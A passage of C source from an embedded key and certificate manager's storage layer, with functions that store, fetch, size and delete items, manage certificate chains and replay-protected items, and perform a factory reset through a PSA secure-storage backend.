kcm_status = storage_build_item_name(chain_context->chain_name, chain_context->chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, &cert_name_info, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build data name");
//Try to read certificate as not last certificate
kcm_status = ksa_item_get_data_size((const uint8_t*)storage_item_name, KCM_CERTIFICATE_ITEM, &cert_size);
//If current name wasn't found, try to read the certificate as last one in the chain
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
cert_name_info.is_last_certificate = true;
//Set the name certificate as last certificate in the chain
kcm_status = storage_build_item_name(chain_context->chain_name, chain_context->chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, &cert_name_info, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build data name");
//retrieve item info (size and flags)
kcm_status = ksa_item_get_data_size(storage_item_name, KCM_CERTIFICATE_ITEM, &cert_size);
//Indication for last certificate
if (kcm_status == KCM_STATUS_SUCCESS) {
cert_name_info.is_last_certificate = true;
}
}
if (kcm_status == KCM_STATUS_ERROR) {
return kcm_status;
}
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status = kcm_status, "item not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, "Failed ksa_item_get_data_size (%" PRId16 ")", kcm_status);
//Set in certificate info array the size of current index
chain_context->certificates_info[certificate_index] = cert_size;
}
SA_PV_ERR_RECOVERABLE_RETURN_IF((cert_name_info.is_last_certificate != true), kcm_status = KCM_STATUS_INVALID_NUM_OF_CERT_IN_CHAIN, "Failed to set size of certificate chain");
chain_context->num_of_certificates_in_chain = (uint32_t)(certificate_index);
return kcm_status;
}
void storage_chain_delete(storage_cert_chain_context_s *chain_context, storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_chain_cert_info_s cert_name_info = { 0, false };
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
do {
cert_name_info.certificate_index = chain_context->current_cert_index;
//Set the name of the certificate in working
kcm_status = storage_build_item_name(chain_context->chain_name,
chain_context->chain_name_len,
KCM_CERTIFICATE_ITEM,
item_prefix_type,
&cert_name_info,
storage_item_name);
//we don't check the result of storage_file_delete, as it is possible that not all certificates were saved to the storage
if (kcm_status == KCM_STATUS_SUCCESS) {
ksa_item_delete((const uint8_t*)storage_item_name, KCM_CERTIFICATE_ITEM);
}
if (chain_context->current_cert_index == 0) {
break;
}
//
chain_context->current_cert_index--;
} while (true);
}
kcm_status_e storage_item_store_impl(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
bool kcm_item_is_factory,
bool kcm_item_is_encrypted,
storage_item_prefix_type_e item_prefix_type,
const uint8_t *kcm_item_data,
size_t kcm_item_data_size)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
uint32_t storage_flags = 0;
ksa_type_location_e ksa_item_location = KSA_PSA_TYPE_LOCATION;
SA_PV_LOG_INFO_FUNC_ENTER("kcm_item_name_len =%" PRIu32 " kcm_item_data_size =%" PRIu32 "", (uint32_t)kcm_item_name_len, (uint32_t)kcm_item_data_size);
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
//set confidentiality flag if enabled
if (kcm_item_is_encrypted) {
storage_flags |= STORAGE_PSA_CONFIDENTIALITY_BIT;
}
kcm_status = ksa_item_store(storage_item_name, storage_flags, kcm_item_type, kcm_item_data, kcm_item_data_size, ksa_item_location, kcm_item_is_factory);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed storing item in PSA (%u)", kcm_status);
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_item_get_data(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e item_prefix_type,
uint8_t *item_data_out,
size_t item_data_max_size,
size_t *item_data_act_size_out)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
size_t item_data_act_size;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_type == KCM_PRIVATE_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "Private key fetch is not permitted");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 ", data max size = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len, (uint32_t)item_data_max_size);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_data_act_size_out == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_data_act_size_out");
SA_PV_ERR_RECOVERABLE_RETURN_IF(((kcm_item_type != KCM_CONFIG_ITEM) && (item_data_out == NULL)), KCM_STATUS_INVALID_PARAMETER, "Provided kcm_item_data is NULL");
SA_PV_ERR_RECOVERABLE_RETURN_IF(((kcm_item_type != KCM_CONFIG_ITEM) && (item_data_max_size == 0)), KCM_STATUS_INVALID_PARAMETER, "Provided kcm_item_data is empty");
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
kcm_status = ksa_item_check_existence((const uint8_t *)storage_item_name, kcm_item_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS && kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Failed getting item data from PSA store (%u)", kcm_status);
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
kcm_status = check_existance_first_cert_in_chain(item_prefix_type, kcm_item_name, kcm_item_name_len, storage_item_name, &item_data_act_size);
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to check single certificate name");
} else {//not certificate
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
}
}
kcm_status = ksa_item_get_data((const uint8_t *)storage_item_name, (uint32_t)kcm_item_type, item_data_out, item_data_max_size, item_data_act_size_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed getting data from from PSA (%u)", kcm_status);
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_item_get_data_size(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e item_prefix_type,
size_t *item_data_act_size_out)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
size_t item_data_act_size = 0;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_type == KCM_PRIVATE_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "Private key fetch is not permitted");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_data_act_size_out == NULL), KCM_STATUS_INVALID_PARAMETER, "Provided item_data_act_size_out is NULL");
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
kcm_status = ksa_item_get_data_size((const uint8_t *)storage_item_name, kcm_item_type, &item_data_act_size);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS && kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Failed getting item data from PSA store (%u)", kcm_status);
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
kcm_status = check_existance_first_cert_in_chain(item_prefix_type, kcm_item_name, kcm_item_name_len, storage_item_name, &item_data_act_size);
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to check single certificate name");
} else {//not certificate
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
}
}
// Set the effective data size for the caller
*item_data_act_size_out = item_data_act_size;
SA_PV_LOG_INFO_FUNC_EXIT("item_data_act_size_out =%" PRIu32 "", (uint32_t)(*item_data_act_size_out));
return kcm_status;
}
palStatus_t storage_rbp_read(
const char *item_name,
uint8_t *data,
size_t data_size,
size_t *data_actual_size_out)
{
palStatus_t pal_status = PAL_SUCCESS;
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
// Validate function parameters
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_name == NULL), PAL_ERR_INVALID_ARGUMENT, "Invalid item_name");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %s", (char*)item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((data == NULL), PAL_ERR_INVALID_ARGUMENT, "Invalid data");
SA_PV_ERR_RECOVERABLE_RETURN_IF((data_size == 0 || data_size > UINT16_MAX), PAL_ERR_INVALID_ARGUMENT, "Invalid data_length");
SA_PV_ERR_RECOVERABLE_RETURN_IF((data_actual_size_out == NULL), PAL_ERR_INVALID_ARGUMENT, "Invalid data_actual_size_out");
//RPB item stored in separate table in KSA, so we don't care about its prefix. KCM_CONFIG_ITEM chosen randomly
kcm_status = storage_build_item_name((const uint8_t*)item_name, strlen(item_name), KCM_CONFIG_ITEM, STORAGE_ITEM_PREFIX_KCM, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
kcm_status = ksa_item_check_existence((const uint8_t*)storage_item_name, STORAGE_RBP_ITEM);
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), PAL_ERR_ITEM_NOT_EXIST, "Item not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), PAL_ERR_GENERIC_FAILURE, "Failed getting item data from PSA store (%u)", kcm_status);
kcm_status = ksa_item_get_data((const uint8_t*)storage_item_name, STORAGE_RBP_ITEM, data, data_size, data_actual_size_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, PAL_ERR_GENERIC_FAILURE, "Failed to get data");
return pal_status;
}
palStatus_t storage_rbp_write(
const char *item_name,
const uint8_t *data,
size_t data_size,
bool is_write_once)
{
uint32_t storage_flags = STORAGE_PSA_REPLAY_PROTECTION_BIT | STORAGE_PSA_CONFIDENTIALITY_BIT;
palStatus_t pal_status = PAL_SUCCESS;
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_name == NULL), PAL_ERR_INVALID_ARGUMENT, "Invalid item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((data_size > UINT16_MAX || data_size == 0), PAL_ERR_INVALID_ARGUMENT, "Invalid param data");
SA_PV_LOG_INFO_FUNC_ENTER("data_size = %" PRIu32 " item_name = %s", (uint32_t)data_size, item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((data == NULL), PAL_ERR_INVALID_ARGUMENT, "Invalid param data");
if (is_write_once == true) {
storage_flags |= STORAGE_PSA_WRITE_ONCE_BIT;
}
//RPB item stored in separate table in KSA, so we don't care about its prefix. KCM_CONFIG_ITEM chosen randomly
kcm_status = storage_build_item_name((const uint8_t*)item_name, strlen(item_name), KCM_CONFIG_ITEM, STORAGE_ITEM_PREFIX_KCM, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
kcm_status = ksa_item_store((const uint8_t *)storage_item_name, storage_flags, STORAGE_RBP_ITEM, data, data_size, KSA_PSA_TYPE_LOCATION, false);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_NOT_PERMITTED), PAL_ERR_ITEM_EXIST, "rbp data write not permitted");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), PAL_ERR_GENERIC_FAILURE, "Failed to write rbp data");
SA_PV_LOG_INFO_FUNC_EXIT();
return pal_status;
}
kcm_status_e storage_cert_chain_get_next_data(kcm_cert_chain_handle *kcm_chain_handle,
uint8_t *kcm_cert_data,
size_t kcm_max_cert_data_size,
storage_item_prefix_type_e item_prefix_type,
size_t *kcm_actual_cert_data_size)
{
storage_cert_chain_context_s *chain_context = (storage_cert_chain_context_s*)kcm_chain_handle;
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_chain_cert_info_s cert_name_info = { 0, false };
uint8_t storage_cert_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
SA_PV_LOG_INFO_FUNC_ENTER("max_cert_data_size = %" PRIu32 "", (uint32_t)kcm_max_cert_data_size);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_chain_handle == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid chain handle");
SA_PV_ERR_RECOVERABLE_RETURN_IF((chain_context->num_of_certificates_in_chain == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid num_of_certificates_in_chain");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_cert_data == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_cert_data");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_max_cert_data_size == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_max_cert_data_size");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_actual_cert_data_size == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_actual_cert_data_size");
SA_PV_ERR_RECOVERABLE_RETURN_IF((chain_context->operation_type != STORAGE_CHAIN_OP_TYPE_OPEN), KCM_STATUS_INVALID_PARAMETER, "Invalid operation type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((chain_context->current_cert_index >= chain_context->num_of_certificates_in_chain), KCM_STATUS_INVALID_NUM_OF_CERT_IN_CHAIN, "Invalid certificate index");
// Check if KCM initialized, if not initialize it
if (!g_kcm_initialized) {
kcm_status = kcm_init();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "KCM initialization failed\n");
}
cert_name_info.certificate_index = chain_context->current_cert_index;
if ((chain_context->num_of_certificates_in_chain - 1) == chain_context->current_cert_index) {
cert_name_info.is_last_certificate = true;
}
//Build certificate name according to its index in certificate chain
kcm_status = storage_build_item_name(chain_context->chain_name, chain_context->chain_name_len, KCM_LAST_ITEM, item_prefix_type, &cert_name_info, storage_cert_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
kcm_status = ksa_item_get_data((const uint8_t*)storage_cert_name, KCM_CERTIFICATE_ITEM, kcm_cert_data, kcm_max_cert_data_size, kcm_actual_cert_data_size);
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, kcm_status = kcm_status, "Failed to get data");
// file read, increase current_cert_index
chain_context->current_cert_index++;
SA_PV_LOG_INFO_FUNC_EXIT("act_cert_data_size = %" PRIu32 "", (uint32_t)*kcm_actual_cert_data_size);
return kcm_status;
}
kcm_status_e storage_cert_chain_add_next_impl(kcm_cert_chain_handle kcm_chain_handle, const uint8_t *kcm_cert_data, size_t kcm_cert_data_size, storage_item_prefix_type_e item_prefix_type)
{
storage_cert_chain_context_s *chain_context = (storage_cert_chain_context_s*)kcm_chain_handle;
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_cert_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
kcm_chain_cert_info_s cert_name_info = { 0 };
uint32_t storage_flags = 0;
ksa_type_location_e ksa_item_location = KSA_PSA_TYPE_LOCATION;
SA_PV_LOG_TRACE_FUNC_ENTER("cert_data_size = %" PRIu32 "", (uint32_t)kcm_cert_data_size);
//Set is the certificate is last in the chain
if (chain_context->current_cert_index == chain_context->num_of_certificates_in_chain - 1) {
cert_name_info.is_last_certificate = true;
} else {
cert_name_info.is_last_certificate = false;
}
//Set current certificate index
cert_name_info.certificate_index = chain_context->current_cert_index;
//Build complete name of current certificate
kcm_status = storage_build_item_name(chain_context->chain_name, chain_context->chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, NULL, storage_cert_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
//If single certificate with the chain name is exists in the data base - return an error
//kcm_status = ksa_check_key_existence((const uint8_t*)kcm_complete_name, strlen(kcm_complete_name));
kcm_status = ksa_item_check_existence((const uint8_t*)storage_cert_name, KCM_CERTIFICATE_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_SUCCESS), kcm_status = KCM_STATUS_FILE_EXIST, "Data with the same name already exists");
//Set the complete name to working path
kcm_status = storage_build_item_name(chain_context->chain_name, chain_context->chain_name_len, KCM_CERTIFICATE_ITEM, item_prefix_type, &cert_name_info, storage_cert_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
//if certificate with the same name exists, overwrite with a new one
kcm_status = ksa_item_check_existence((const uint8_t*)storage_cert_name, KCM_CERTIFICATE_ITEM);
if (kcm_status == KCM_STATUS_SUCCESS) {
ksa_item_delete((const uint8_t*)storage_cert_name, KCM_CERTIFICATE_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF(kcm_status != KCM_STATUS_SUCCESS, kcm_status = kcm_status, "Failed to remove ceritificate in chain");
}
//Write the certificate
kcm_status = ksa_item_store((const uint8_t*)storage_cert_name, storage_flags, KCM_CERTIFICATE_ITEM, kcm_cert_data, kcm_cert_data_size, ksa_item_location, chain_context->is_factory);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, "Failed to write data to PSA");
//Increase chian current index
chain_context->current_cert_index++;
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return KCM_STATUS_SUCCESS;
}
kcm_status_e storage_cert_chain_delete(const uint8_t *kcm_chain_name, size_t kcm_chain_name_len, storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
//kcm_status_e final_kcm_status = KCM_STATUS_SUCCESS;
size_t kcm_chain_len = 0;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
kcm_cert_chain_handle kcm_chain_handle;
storage_cert_chain_context_s *chain_context = NULL;
kcm_chain_cert_info_s cert_name_info = { 0, false };
kcm_status_e final_kcm_status = KCM_STATUS_SUCCESS;
// Validate function parameters
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_chain_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_chain_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_chain_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_chain_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("chain name = %.*s", (int)kcm_chain_name_len, kcm_chain_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
// Check if KCM initialized, if not initialize it
if (!g_kcm_initialized) {
kcm_status = kcm_init();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "KCM initialization failed\n");
}
// open the first file and read the kcm_chain_len from meta data
kcm_status = storage_cert_chain_open(&kcm_chain_handle, kcm_chain_name, kcm_chain_name_len, item_prefix_type, &kcm_chain_len);
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
return kcm_status;
}
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to open certificate chain\n");
chain_context = (storage_cert_chain_context_s*)kcm_chain_handle;
//Go over all chain certificates and delete
for (; chain_context->current_cert_index < kcm_chain_len; chain_context->current_cert_index++) {
cert_name_info.certificate_index = chain_context->current_cert_index;
if (chain_context->current_cert_index == kcm_chain_len - 1) {
cert_name_info.is_last_certificate = true;
}
//Set the name certificate as last certificate in the chain
kcm_status = storage_build_item_name(chain_context->chain_name,
chain_context->chain_name_len,
KCM_CERTIFICATE_ITEM,
item_prefix_type,
&cert_name_info,
storage_item_name);
//Remove certificate only if complete_data_name is valid
if (kcm_status == KCM_STATUS_SUCCESS) {
//Remove the certificate
kcm_status = ksa_item_delete((const uint8_t*)storage_item_name, KCM_CERTIFICATE_ITEM);
if (kcm_status != KCM_STATUS_SUCCESS) {
//If Remove failed, record the error and continue delete process
final_kcm_status = kcm_status;
}
}
}
(void)storage_cert_chain_close(kcm_chain_handle, item_prefix_type);
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return final_kcm_status;
}
kcm_status_e storage_item_delete(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
size_t item_data_act_size;
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
kcm_status = ksa_item_check_existence((const uint8_t*)storage_item_name, kcm_item_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS && kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Failed getting item data from PSA store (%u)", kcm_status);
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
kcm_status = check_existance_first_cert_in_chain(item_prefix_type, kcm_item_name, kcm_item_name_len, storage_item_name, &item_data_act_size);
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to check single certificate name");
} else {//not certificate
SA_PV_TRACE_RECOVERABLE_RETURN_IF((kcm_status == KCM_STATUS_ITEM_NOT_FOUND), kcm_status, "Item not found");
}
}
kcm_status = ksa_item_delete((const uint8_t *)storage_item_name, kcm_item_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed destorying PSA key (%u)", kcm_status);
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_factory_reset()
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
//set "FR_ON" flag to indicate that Factory Reset process started
//RBP item type is used, so this flag won't be affected by factory reset process
kcm_status = storage_build_item_name((const uint8_t*)STORAGE_FACTORY_RESET_IN_PROGRESS_ITEM, strlen(STORAGE_FACTORY_RESET_IN_PROGRESS_ITEM), KCM_CONFIG_ITEM, STORAGE_ITEM_PREFIX_KCM, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
kcm_status = ksa_item_store((const uint8_t*)storage_item_name, 0, STORAGE_RBP_ITEM, NULL, 0, KSA_PSA_TYPE_LOCATION, false);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed storing item in PSA (%u)", kcm_status);
kcm_status = ksa_factory_reset();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed in ksa_factory_reset");
//remove "FR_ON" flag after factory reset finished successfully
kcm_status = ksa_item_delete((const uint8_t*)storage_item_name, STORAGE_RBP_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to remove item");
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_key_get_handle(
const uint8_t *key_name,
size_t key_name_len,
kcm_item_type_e key_type,
storage_item_prefix_type_e item_prefix_type,
kcm_key_handle_t *key_h_out)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
psa_key_handle_t key_handle;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_type != KCM_PRIVATE_KEY_ITEM && key_type != KCM_PUBLIC_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "key type not supported");
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid key_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid key_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)key_name_len, (char*)key_name, (uint32_t)key_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid key_source_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_type != KCM_PRIVATE_KEY_ITEM && key_type != KCM_PUBLIC_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "Invalid key type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_h_out == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid key_h_out");
*key_h_out = 0;
// Check if KCM initialized, if not initialize it
if (!g_kcm_initialized) {
